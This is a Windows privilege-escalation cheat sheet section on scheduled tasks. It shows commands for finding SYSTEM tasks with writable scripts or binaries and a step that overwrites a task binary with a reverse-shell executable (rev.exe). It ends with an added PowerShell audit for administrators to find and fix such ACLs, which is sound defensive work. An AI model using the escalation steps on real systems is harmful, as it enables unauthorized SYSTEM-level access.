SCHEDULED TASKS

List scheduled tasks

All scheduled tasks — Tasks running as SYSTEM

schtasks /query /fo LIST /v
Get-ScheduledTask
Example Output
schtasks /query /fo LIST /v | findstr /i /c:"TaskName" /c:"Run As User" /c:"Task To Run"
TaskName: \CustomBackup
Run As User: SYSTEM
Task To Run: C:\Scripts\backup.bat
(Runs as SYSTEM - check if script is writable)

Writable task scripts

Can you modify the script? — Runs as task owner

Check permissions on scripts referenced by tasks
icacls <script_path>
Example Output
schtasks /query /fo LIST /v | findstr /i "task run author"
TaskName: \Backup
Run As User: SYSTEM
Task To Run: C:\Scripts\backup.bat

icacls C:\Scripts\backup.bat
BUILTIN\Users:(F)  <- FULL CONTROL!
(Modify script, wait for execution)

Task binary replacement

Replace with reverse shell — Waits for next scheduled run

If task runs a binary you can overwrite
Example Output
Task runs: C:\Scripts\app.exe
icacls C:\Scripts\app.exe -> Users:(F)

copy C:\temp\rev.exe C:\Scripts\app.exe /Y
(Wait for scheduled run or trigger manually)
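
Audit for the conditions above (added example, not part of the original cheat sheet): a PowerShell check an administrator can run to list files executed by SYSTEM tasks that low-privileged groups can modify, so the ACLs can be tightened. The group list, the Get-TaskTargetPath helper and the argument-path regex are assumptions of this example; group names are the English ones.

```powershell
# Added example: list files run by SYSTEM scheduled tasks that low-privileged
# groups can modify. Run elevated so every task and ACL is readable.

# Groups that should not be able to change a file run by SYSTEM (assumed list).
$lowPriv = 'BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
           'NT AUTHORITY\INTERACTIVE'

# Rights that let a holder change the file's content, directly or by first
# changing its ACL or owner, plus GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000).
$writeBits = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, ChangePermissions, TakeOwnership' -bor 0x50000000

# Hypothetical helper: returns candidate file paths for one task action.
function Get-TaskTargetPath {
    param($Action)
    # The executable itself, with quotes removed and %VARS% expanded.
    [Environment]::ExpandEnvironmentVariables(([string]$Action.Execute).Trim('"'))
    # Heuristic: absolute paths in the arguments (e.g. cmd.exe /c C:\Scripts\backup.bat).
    # Paths that contain spaces are not matched.
    [regex]::Matches([string]$Action.Arguments, '[A-Za-z]:\\[^"\s]+') |
        ForEach-Object { $_.Value }
}

$findings = foreach ($task in Get-ScheduledTask) {
    # Keep only tasks whose principal is SYSTEM.
    if ($task.Principal.UserId -notmatch '^(NT AUTHORITY\\)?SYSTEM$|^S-1-5-18$') { continue }
    # COM-handler and other non-exec actions have no Execute property and are skipped.
    foreach ($action in ($task.Actions | Where-Object { $_.Execute })) {
        foreach ($path in (Get-TaskTargetPath $action | Select-Object -Unique)) {
            # Bare names such as cmd.exe (resolved via PATH at run time) are skipped.
            if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }
            foreach ($rule in (Get-Acl -LiteralPath $path).Access) {
                if ($rule.AccessControlType -eq 'Allow' -and
                    $rule.IdentityReference.Value -in $lowPriv -and
                    ([int]$rule.FileSystemRights -band $writeBits)) {
                    [pscustomobject]@{
                        Task     = $task.TaskPath + $task.TaskName
                        Target   = $path
                        Identity = $rule.IdentityReference.Value
                        Rights   = $rule.FileSystemRights
                    }
                }
            }
        }
    }
}
$findings | Sort-Object Task, Target | Format-Table -AutoSize -Wrap
```

An empty result means no listed group holds write-type rights on any resolved target; each row returned is a file whose ACL should be restricted to administrators and SYSTEM.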